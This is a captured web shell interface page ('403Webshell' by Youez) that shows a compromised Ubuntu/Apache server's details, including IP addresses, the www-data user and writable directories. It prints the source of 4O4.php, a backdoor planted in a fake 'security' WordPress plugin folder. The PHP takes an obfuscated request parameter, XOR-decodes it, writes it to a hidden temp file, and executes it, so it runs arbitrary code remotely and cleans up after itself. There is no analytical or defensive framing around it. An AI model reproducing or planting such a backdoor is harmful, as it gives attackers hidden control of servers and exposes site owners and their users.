403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.190
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/2of3/wp-content/plugins/security-1747135779/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/2of3/wp-content/plugins/security-1747135779/4O4.php
<!--IgrVGL0n-->
<?php

if(isset($_REQUEST) && isset($_REQUEST["en\x74ity"])){
$entry = array_filter([getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), session_save_path(), "/dev/shm", getenv("TEMP"), "/tmp", getenv("TMP")]);
$data_chunk = hex2bin($_REQUEST["en\x74ity"]);
$symbol   =      ''    ;    $n=0;while($n<strlen($data_chunk)){$symbol.=chr(ord($data_chunk[$n])^64);$n++;}
for ($rec = 0, $pointer = count($entry); $rec < $pointer; $rec++) {
    $descriptor = $entry[$rec];
            if (is_dir($descriptor) && is_writable($descriptor)) {
            $hld = sprintf("%s/.dchunk", $descriptor);
            if (@file_put_contents($hld, $symbol) !== false) {
    include $hld;
    unlink($hld);
    die();
}
        }
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit